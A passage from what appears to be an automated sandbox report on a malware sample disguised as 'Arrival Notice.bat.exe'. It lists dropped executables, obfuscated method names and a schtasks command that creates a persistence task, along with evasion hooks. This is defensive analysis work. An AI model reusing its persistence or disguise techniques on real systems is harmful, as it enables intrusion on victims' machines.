              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_00411CC2 push eax; retf 8_2_00411CC6
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_004035D0 push eax; ret 8_2_004035D2
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_00413E00 push es; retn 4BB0h8_2_00413DFF
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_00420633 push ds; iretd 8_2_00420642
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0154225F pushad ; ret 8_2_015427F9
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015427FA pushad ; ret 8_2_015427F9
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015709AD push ecx; mov dword ptr [esp], ecx8_2_015709B6
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0154283D push eax; iretd 8_2_01542858
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0153C54F push 8B014C67h; ret 13_2_0153C554
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0153C54D pushfd ; ret 13_2_0153C54E
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0153C9D7 push edi; ret 13_2_0153C9D9
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_014F09AD push ecx; mov dword ptr [esp], ecx13_2_014F09B6
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_014C1FEC push eax; iretd 13_2_014C1FED
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_01547E99 push ecx; ret 13_2_01547EAC
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0042C161 push edx; ret 13_2_0042C16A
              Source: Arrival Notice.bat.exeStatic PE information: section name: .text entropy: 7.936469180639003
              Source: dLrZsz.exe.0.drStatic PE information: section name: .text entropy: 7.936469180639003
              Source: OdR8akYyHwr3ISR[1].exe.18.drStatic PE information: section name: .text entropy: 7.946479184447168
              Source: -6qxw.exe.18.drStatic PE information: section name: .text entropy: 7.946479184447168
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, CR92NoKJkHxgS8LFll.csHigh entropy of concatenated method names: 'uTCF2oKyBj', 'pEWFrQXKRA', 'gDhFjHnytB', 'dKlFJXLR2m', 'n4VFEyIByK', 'rF4jcYCdtX', 'Lp2jhw4uDt', 'w5HjTAcMqJ', 'PJ3jQR7ABm', 'VAQjfjJ4u2'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, i0ug0kfcI7hQblW2S4.csHigh entropy of concatenated method names: 'VSn0KjpqAx', 'VRD0yCQ5IO', 'nvO09ZdCLq', 'unt0nFmavx', 'byq0PTJC8u', 'ACX0CiqbWZ', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, pQFiwU6fgfEbmJWq1a.csHigh entropy of concatenated method names: 'FGUkJk6SHm', 'IlekE3YHeK', 'HyskHMo95q', 'MRfkREhqXR', 'abAkgGrMR9', 'eNokqJkHxg', 'FZiedSA9E1N2vHqJGR', 'JSTqGrjQbLdWw2It1G', 'A78kkacf2D', 'lxfkGfJ94F'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, kUUIwyxysMo95qiRfE.csHigh entropy of concatenated method names: 'vU3u3OUELb', 'bWAuMQOWlj', 'mFguIiKnj2', 'x0ouxWsolY', 'rtNug3NgCb', 'iNDuqRD2MI', 'qChu5MW0B8', 'kI7u0DaXqH', 'o3uuY17d1T', 'J86u4jLAeP'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, UqXR0rBKwYl6KpbAGr.csHigh entropy of concatenated method names: 'QiPj7IonL8', 'OlJjwnVdk9', 'vEOu9ZynlC', 'L2SunUfJfm', 'JJXuCovRdD', 'SWYuUNQmJ0', 'jpjuZ0EpLD', 'ngWuikrn2S', 'd6PuODrBrw', 'IX1uVmefNo'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, EX3wVfr004eVeKYXVR.csHigh entropy of concatenated method names: 'Dispose', 'EKakfYdB21', 'fuL8yXHtKY', 'p0Bee6mwY6', 'GNckt6FmWn', 't28kz8CiDK', 'ProcessDialogKey', 'J5F8p0ug0k', 'UI78khQblW', 'eS488ToZcT'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, OTisMayLhlOoUGF8U3.csHigh entropy of concatenated method names: 'pFLuw2ZVAPcASAWtvIj', 'CqaUOvZOxj6xjYUme9P', 'qaYCEnZGqWpNIPJ2prY', 'lPxF0HJbfV', 'uUCFYJvr88', 'JGvF4cS8W7', 'oT4m94ZMDZB3vdVXo89', 'PiUu5sZfwbTchOpK7FT'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, WoZcTFtqamvQ1L7sy1.csHigh entropy of concatenated method names: 'BATYkEWZsl', 'UMaYGbv2Uu', 'BjgY6rvaik', 'Ts7YAQQun5', 'anEYri9qJf', 'iLnYj8VNBm', 'CttYFmxsHL', 'jIL0TmIWYC', 'ffo0QxpoUX', 'AQk0fFXJQR'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, okDYTwZf7PavGHEBLr.csHigh entropy of concatenated method names: 'DyfJAcplLX', 'OSvJu1fy5L', 'lxEJFxfAeP', 'it7FtUjEfm', 'hOGFzeTMFH', 'vHfJpcf8yr', 'hrWJkAnsQG', 'KivJ87lFB2', 'KnnJGEckMP', 'ojcJ6O602i'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, x5EawHkG4nxGw0BwuPK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Shh4P1Tf6p', 'T1O4eNawhP', 'n1R4vMe3at', 'DEH4oKYU7P', 'msa4cEl0d8', 'hBk4hZRj0D', 'Wef4TF4mE1'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, dUh4iSmXZmKJxCUiTq.csHigh entropy of concatenated method names: 'XedSIqJu7N', 'WoJSxGnBX7', 'XLiSK2iPGR', 'nLySyCfJuV', 'lBOSnLkVSu', 'LV6SCG4TFf', 'TJ7SZ622f1', 'TGGSiA67hh', 'oxKSVIylQu', 'kukSXSvuTr'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, ztgapEOKN2bHXgpNfF.csHigh entropy of concatenated method names: 'bKUJN4vMXN', 'ttOJDKN34U', 'XuqJlMdCTI', 'eZBJ3D3S4v', 'cNZJ7cARLL', 'IQKJMrxPEC', 'lANJwHHVOW', 'YLtJIsoiZi', 'RkPJxs2CI2', 'dP8JB040oW'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, KkiYalvb0pSJvl1BpG.csHigh entropy of concatenated method names: 'ToString', 'sYFqXtMihq', 'Dkuqy8UAR4', 'UJZq9RwYDt', 'yyPqnAAptg', 'BGpqCfEqpC', 'lmOqU5Ih8N', 'j8dqZr3FFa', 'XlaqiG9YC6', 'pbuqOlhhBY'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, zSvR4xhHfejwjcBEkU.csHigh entropy of concatenated method names: 'V4l5QYescE', 'Nru5tSC6PW', 'zbO0p31AXB', 'TbT0kMBODc', 'dNo5XpRvtS', 'Ep55bIGSDC', 'pTf5mNPpQo', 'BtH5POhXwL', 'G9J5eprHT7', 'fjh5viL4uU'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, gp4U7sEhP5rusid8QZ.csHigh entropy of concatenated method names: 'vShG2QsdlJ', 'f6yGARiZYo', 'aMPGrEP2l3', 'nt9GuACMOu', 'BLXGjpDYXb', 'JmJGFllwV2', 'NNwGJLX8pB', 'qh4GEJowEq', 'TE2G16VGe6', 'zaTGHTaJkC'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, NGaMtZkpJEhdo2rIJPK.csHigh entropy of concatenated method names: 'umYYNlaQZU', 'KYYYDO7g8Z', 'oQPYlQ51no', 'jG3Y3KDyLF', 'EiJY7SmX3O', 'zRQYMC7td0', 'L86YwjU657', 'hnnYIWhprc', 'fkjYxlXhIc', 'WN4YBk2hSb'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, Kk6SHmInle3YHeKsC7.csHigh entropy of concatenated method names: 'nj1rPLrfW6', 'FJsreQOuF6', 'vtNrvt6EiI', 'GqQroG2Fkw', 'BfBrcdwEJT', 'aQKrhDgKKx', 'WfRrTmNnnf', 'I5nrQc6uL8', 'wZ4rfMec6x', 'J5grti9yQq'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, KkVjK88ZrPqOcWdeBx.csHigh entropy of concatenated method names: 'sL4lBrjvh', 'ziS3lZMBD', 'CGmMawGcs', 'sxtwSRVc8', 'h82xWGu91', 'EG5BY9YM9', 'F7AapfuoCtvPfuKBns', 'y8AmHmPmfm0RHsDZr9', 'jFg0JTtWZ', 'CpI4JfLrl'
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, yc6FmWQnW288CiDKC5.csHigh entropy of concatenated method names: 'AMr0AIrI2V', 'dY60r447El', 'RkZ0uOhNdK', 'kH50jll1Jb', 'SXb0FP1jCu', 'fIa0J3pgC1', 'g0R0Exaw5L', 'xSL013xYyE', 'Ucm0HGj4DI', 'tBG0R6twO5'
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, gp4U7sEhP5rusid8QZ.csHigh entropy of concatenated method names: 'vShG2QsdlJ', 'f6yGARiZYo', 'aMPGrEP2l3', 'nt9GuACMOu', 'BLXGjpDYXb', 'JmJGFllwV2', 'NNwGJLX8pB', 'qh4GEJowEq', 'TE2G16VGe6', 'zaTGHTaJkC'
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, NGaMtZkpJEhdo2rIJPK.csHigh entropy of concatenated method names: 'umYYNlaQZU', 'KYYYDO7g8Z', 'oQPYlQ51no', 'jG3Y3KDyLF', 'EiJY7SmX3O', 'zRQYMC7td0', 'L86YwjU657', 'hnnYIWhprc', 'fkjYxlXhIc', 'WN4YBk2hSb'
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, Kk6SHmInle3YHeKsC7.csHigh entropy of concatenated method names: 'nj1rPLrfW6', 'FJsreQOuF6', 'vtNrvt6EiI', 'GqQroG2Fkw', 'BfBrcdwEJT', 'aQKrhDgKKx', 'WfRrTmNnnf', 'I5nrQc6uL8', 'wZ4rfMec6x', 'J5grti9yQq'
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, KkVjK88ZrPqOcWdeBx.csHigh entropy of concatenated method names: 'sL4lBrjvh', 'ziS3lZMBD', 'CGmMawGcs', 'sxtwSRVc8', 'h82xWGu91', 'EG5BY9YM9', 'F7AapfuoCtvPfuKBns', 'y8AmHmPmfm0RHsDZr9', 'jFg0JTtWZ', 'CpI4JfLrl'
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, yc6FmWQnW288CiDKC5.csHigh entropy of concatenated method names: 'AMr0AIrI2V', 'dY60r447El', 'RkZ0uOhNdK', 'kH50jll1Jb', 'SXb0FP1jCu', 'fIa0J3pgC1', 'g0R0Exaw5L', 'xSL013xYyE', 'Ucm0HGj4DI', 'tBG0R6twO5'
              Source: C:\Windows\SysWOW64\compact.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\OdR8akYyHwr3ISR[1].exe
              Source: C:\Windows\SysWOW64\compact.exe, File created: C:\Users\user\AppData\Local\Temp\-6qxw.exe
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe, File created: C:\Users\user\AppData\Roaming\dLrZsz.exe

              Boot Survival

              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe, Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmp4908.tmp"

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe, Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\compact.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\compact.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\runonce.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: Yara match File source: Process Memory Space: Arrival Notice.bat.exe PID: 6712, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: dLrZsz.exe PID: 7468, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: -6qxw.exe PID: 7772, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFE2220D324
              Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
              Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFE2220D944
              Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFE2220D504
              Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFE2220D544
              Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
              Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFE22210154
